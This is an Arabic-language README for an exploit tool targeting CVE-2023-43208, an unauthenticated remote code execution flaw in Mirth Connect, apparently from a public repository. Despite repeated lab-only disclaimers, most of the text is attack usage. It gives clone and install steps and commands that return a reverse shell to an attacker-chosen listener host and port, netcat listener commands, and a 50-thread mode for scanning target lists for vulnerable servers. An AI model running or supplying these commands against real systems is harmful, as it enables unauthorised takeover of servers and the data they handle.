
استغلال إثبات مفهوم لـ CVE-2023-43208، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Mirth Connect قبل الإصدار 4.4.1.
⚠️ للاستخدام التعليمي والمختبري فقط ⚠️
استغلال إثبات المفهوم لـ CVE-2023-43208، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Mirth Connect قبل الإصدار 4.4.1.
هذه الأداة مخصصة فقط لـ:
لا تستخدم:
أنت مسؤول عن الامتثال لجميع القوانين واللوائح المعمول بها. قد يؤدي سوء استخدام هذه الأداة إلى تهم جنائية.
يستهدف هذا الاستغلال ثغرة إلغاء تسلسل XML في نقطة النهاية /api/users في Mirth Connect، مما يسمح بتنفيذ تعليمات برمجية عن بُعد بدون مصادقة على الإصدارات المتأثرة (< 4.4.1).
هذه ثغرة حرجة ويجب اختبارها فقط في بيئات مختبرية معزولة باستخدام أنظمتك الخاصة.
requirements.txt# استنساخ المستودع
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT
# تثبيت المتطلبات
pip install -r requirements.txt
python exploit.py
# استغلال هدف واحد (للاستخدام المختبري فقط)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# مسح أهداف متعددة من ملف (للاستخدام المختبري فقط)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# وضع غير تفاعلي (للاستخدام المختبري فقط)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
-u, --url عنوان الهدف المستهدف (للاستخدام المختبري فقط)
-lh, --lhost عنوان المستمع (عنوان IP الخاص بك)
-lp, --lport منفذ الاستماع
-f, --file ملف يحتوي على عناوين الأهداف للمسح
-o, --output ملف الإخراج لحفظ نتائج المسح
-t, --threads عدد الخيوط للمسح (الافتراضي: 50)
--no-interactive تشغيل في الوضع غير التفاعلي
قم بإعداد مختبرك:
ابدأ المستمع الخاص بك:
ncat -lnvp 4444
# أو
nc -lnvp 4444
شغّل الاستغلال في مختبرك:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
يستخدم الاستغلال أدوات Commons Collections لتحقيق تنفيذ التعليمات البرمجية عن بُعد من خلال نقطة النهاية /api/users.
إذا كنت تدير Mirth Connect:
╔══════════════════════════════════════════════════════════════╗ ║ هذه الأداة للاستخدام المختبري فقط ║ ║ الاستخدام غير المصرح به غير قانوني وغير أخلاقي ║ ║ أنت تتحمل كل المخاطر والمسؤوليات ║ ║ المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام ║ ╚══════════════════════════════════════════════════════════════╝